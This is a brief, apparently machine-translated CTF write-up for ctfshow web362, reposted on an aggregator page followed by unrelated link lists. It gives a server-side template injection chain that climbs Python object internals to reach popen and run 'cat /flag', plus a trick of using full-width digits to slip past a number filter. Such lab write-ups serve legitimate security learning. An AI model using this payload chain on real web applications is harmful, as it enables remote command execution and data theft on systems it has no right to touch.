当前位置:网站首页>ctfshow-web362(SSTI)
ctfshow-web362(SSTI)
2022-04-23 18:29:00 【m0_ sixty-two million ninety-four thousand eight hundred and fo】
?name={
{"".__class__.__bases__[0].__subclasses__()}} It's normal up to this point 
from 12 It didn't work at first 
There's a problem with the numbers , see wp Use full angle numbers instead of normal numbers to bypass
?name={
{"".__class__.__bases__[0].__subclasses__()[132]}}
Then you should be able to do it in the normal way
?name={
{"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}
版权声明
本文为[m0_ sixty-two million ninety-four thousand eight hundred and fo]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/04/202204231829007951.html
边栏推荐
- 深度学习经典网络解析目标检测篇(一):R-CNN
- JD freefuck Jingdong HaoMao control panel background Command Execution Vulnerability
- QT curve / oscilloscope customplot control
- 回路-通路
- Introduction to quantexa CDI syneo platform
- 14 py games source code share the second bullet
- C medium? This form of
- CISSP certified daily knowledge points (April 14, 2022)
- STM32: LCD显示
- 【ACM】376. Swing sequence
猜你喜欢
Halo open source project learning (VII): caching mechanism
Spark performance optimization guide
Creation and use of QT dynamic link library
Use of regular expressions in QT
Function recursion and solving interesting problems
昇腾 AI 开发者创享日全国巡回首站在西安成功举行
From introduction to mastery of MATLAB (2)
硬核解析Promise對象(這七個必會的常用API和七個關鍵問題你都了解嗎?)
Resolves the interface method that allows annotation requests to be written in postman
【ACM】455. 分发饼干(1. 大饼干优先喂给大胃口;2. 遍历两个数组可以只用一个for循环(用下标索引--来遍历另一个数组))
随机推荐
Serialization scheme of serde - trust
使用 bitnami/postgresql-repmgr 镜像快速设置 PostgreSQL HA
回路-通路
Mysqldump backup database
Function recursion and solving interesting problems
Win1远程出现“这可能是由于credssp加密oracle修正”解决办法
Daily CISSP certification common mistakes (April 15, 2022)
Nodejs installation
Feign requests the log to be printed uniformly
Daily CISSP certification common mistakes (April 12, 2022)
QT curve / oscilloscope customplot control
Rust: how to match a string?
Stm32mp157 wm8960 audio driver debugging notes
K210串口通信
Imx6 debugging LVDS screen technical notes
Rust: the output information of println is displayed during the unit test
The connection of imx6 network port is unstable after power on
Custom prompt box MessageBox in QT
Cygwin64 right click to add menu, and open cygwin64 here
Cutting permission of logrotate file